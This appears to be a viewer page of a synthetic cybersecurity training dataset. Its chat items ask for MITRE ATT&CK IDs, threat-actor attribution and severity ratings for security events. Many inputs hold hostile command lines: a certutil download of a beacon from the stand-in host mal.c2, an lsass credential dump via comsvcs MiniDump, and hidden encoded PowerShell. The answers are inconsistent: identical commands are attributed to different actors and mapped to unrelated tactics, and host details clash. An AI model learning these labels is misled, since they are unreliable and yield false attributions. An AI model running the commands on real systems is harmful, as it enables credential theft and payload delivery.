messages listlengths 2 2 |
|---|
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, WMI, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\",... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.123.76.88",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\", \"TA004... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 1997 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.172.100.25",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\"... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: load additional modules",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1129\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-NY4TNY5IQO)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Discovery, Defense Evasion",
"role": "user"
},
{
"content": "{\... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Fileless, LOLBin, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confide... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-OVJICKR72D)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Impact",
"role": "user"
},
{
"content": "{\"severity\": \"Extreme... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-FRNKF6WG51)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Persistence, Lateral Movement",
"role": "user"
},
{
"content": "{\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2882 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, JA3 Spoof, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"conf... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 2351 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.46.19.60",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\", ... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.173.129.163",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\", \"TA00... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Enable Safe DLL Search Mode to force search for system DLLs in directories with greater restrictions ( %SYSTEMROOT%)to be used before local directory DLLs ( a user's home directory)",
"role": "user"
},
{
"conte... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: LOLBin, Fileless, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, Base64, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Ryuk has injected itself into remote processes to encrypt files using a combination of VirtualAlloc, WriteProcessMemory, and CreateRemoteThread.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-QMYLIJJ291)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Discovery, Defense Evasion",
"role": "user"
},
{
"content": "{\"... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Threat Group-3390 actors have used a modified version of Mimikatz called Wrapikatz to dump credentials.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1003\", \"T1003.001\"]}"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-9ITTJFC54C)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Reconnaissance, Collection, Initial Access",
"role": "user"
},
{... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2197 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, Fileless, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.33.4.86",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1566.0... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3160 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, LOLBin, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", \"c... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: ZeroT has encrypted its payload with RC4.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3141 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Fileless, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confide... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Base64, TLS, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \"confidence\":... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.62.41.184",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1484.... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-DXM7JKI442)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Privilege Escalation, Persistence",
"role": "user"
},
{
"c... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-UHKJCIZ447)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Initial Access",
"role": "user"
},
{
"content": "{\"severity\":... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 1001 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.175.158.116",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\"], \"tec... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.43.228.171",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0040\"... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.111.252.11",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA00... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: PUNCHBUGGY can load a DLL using the LoadLibrary API.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1129\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-X0IDAC8KXS)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Impact, Execution",
"role": "user"
},
{
"content": "{\"severity\... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: BoxCaon can download files.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1105\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 753 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, LOLBin, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", ... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: TLS, LOLBin, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-3H2IMWIF42)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Discovery, Credential Access",
"role": "user"
},
{
"content"... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.130.132.51",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\", \"TA0002\"... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 1679 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.88.47.198",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\", \"TA0008\"], \"techniques\": ... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Fileless, JA3 Spoof, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", ... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 1937 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.164.123.201",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0010\", \"TA0043\"], \"... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 2038 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.1.82.231",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\", \"TA0009\"], \"techniques\": [... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Monitor for indications of Pass the Ticket being used to move laterally.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1558\", \"T1558.001\"]}",
"role": "assistant"
}
] |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Denis performed process hollowing through the API calls CreateRemoteThread, ResumeThread, and Wow64SetThreadContext.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0005\"], \"techniques\... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3293 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Base64, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confid... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-14ZHZNT7QF)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Command and Control, Privilege Escalation",
"role": "user"
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, Base64, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoo... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, JA3 Spoof, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\"... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.80.61.99",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], ... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Leviathan has utilized techniques like reflective DLL loading to write a DLL into memory and load a shell that provides backdoor access to the victim.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 507 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.158.54.130",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\", \"T... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.10.214.131",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\", \"... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Sykipot is known to contain functionality that enables targeting of smart card technologies to proxy authentication for connections to restricted network resources using detected hardware tokens.",
"role": "user"... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 3932 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.28.192.136",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1071.... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: APT17 has created and cultivated profile pages in Microsoft TechNet.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0042\"], \"techniques\": [\"T1585\"]}",
"role": "assistant"
}
] |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.59.149.17",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\", \"TA... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Threat Group-3390 has lured victims into opening malicious files containing malware.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1204.002\", \"T1204\"]}",
"role":... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.108.103.29",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-SUZ3FHI923)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Exfiltration",
"role": "user"
},
{
"content": "{\"severity\": \"Extre... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.87.142.52",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\", \"TA0009\"], \"techniques\": [\"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-6GFWIYW9DX)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Persistence, Execution, Initial Access",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-FYVH14KWIC)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Collection",
"role": "user"
},
{
"content": "{\"severity\": \"Hi... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.6.165.12",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\", \"TA0002\"], \"techniques... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems.If attempts are detected, then investigate endpoint data sources to find the root... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, LOLBin, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", \"c... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: TLS, Base64, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \"conf... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-67KW5QSPV2)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Initial Access, Lateral Movement",
"role": "user"
},
{
"content": "{\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, LOLBin, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Pand... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-A6EBMFFOCE)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Credential Access, Command and Control",
"role": "user"
},
{
... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.34.242.4",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\", \"TA00... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: AdFind can enumerate domain groups.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1069.002\", \"T1069\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 532 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.185.254.73",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1021... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: load additional modules",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1129\"]}",
"role": "assistant"
}
] |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Filename SHA256 Description 7za.exe dd6d7af00ef4ca89a319a230cdd094275c3a1d365807fe5b34133324bdaa0229 7-Zip 17.01 beta hb.exe 3ca3a957c526eaeabcf17b0b2cd345c0fffab549adfdf04470b6983b87f7ec62 Hobocopy nbt.exe c9d... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Sandworm Team has registered domain names and created URLs that are often designed to mimic or spoof legitimate websites, such as email login pages, online file sharing and storage websites, and password reset pages.... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.152.20.166",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA00... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 2571 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.79.139.22",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\", \"TA0010\"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-IO0D0ERJ44)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Impact, Exfiltration",
"role": "user"
},
{
"content": "{\"severity\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-UZVZXQAKOX)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Command and Control",
"role": "user"
},
{
"content": "{\"severity\": ... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: SynAck gathers user names from infected hosts.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1033\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-ZNO8KSBLMW)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Defense Evasion",
"role": "user"
},
{
"content": "{\"seve... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: The IIS w3wp.exe process then loads the malicious DLL.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1505.004\", \"T1505\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-UWEPEX5PGN)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Execution, Collection",
"role": "user"
},
{
"content": "{\"... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Kasidet has the ability to change firewall settings to allow a plug-in to be downloaded.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1562.004\", \"T1562\"]}",
"role": "... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-TDWGYNFLOE)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Credential Access, Privilege Escalation, Persistence",
"role": "user"
}... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-QAMHTUP6FM)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Execution, Command and Control, Privilege Escalation",
"role": "use... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Diavol can delete specified files from a targeted system.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1485\"]}",
"role": "assistant"
}
] |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 1133 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.194.138.59",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-RE91N2941R)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Defense Evasion, Reconnaissance",
"role": "user"
},
{
"content": "{... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.192.8.51",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\", \"TA0003\", \"TA0002\"], \"techniques\": [... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-2B1ZR9JZCW)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Defense Evasion, Credential Access, Command and Control",
"role": "use... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1530 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, LOLBin, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \"co... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-GY0F8L567O)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Lateral Movement",
"role": "user"
},
{
"content": "{\"severity\": ... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 1714 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.160.118.20",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\", \"TA0011\"], \"techniques... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-GK0XN48VO6)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Lateral Movement",
"role": "user"
},
{
"content": "{\"severity\": \"H... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: WMI, JA3 Spoof, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spider... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: The \"ZR\" variant of BACKSPACE will check to see if known host-based firewalls are installed on the infected systems.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T156... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: environmental keying",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1480\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-UWXUT1YSNS)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Discovery, Collection",
"role": "user"
},
{
"content": ... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: An adversary may compress and/or encrypt data that is collected prior to exfiltration.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1560\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-WW2E573L8Z)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Defense Evasion, Exfiltration, Discovery",
"role": "user"
},
{
"content... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.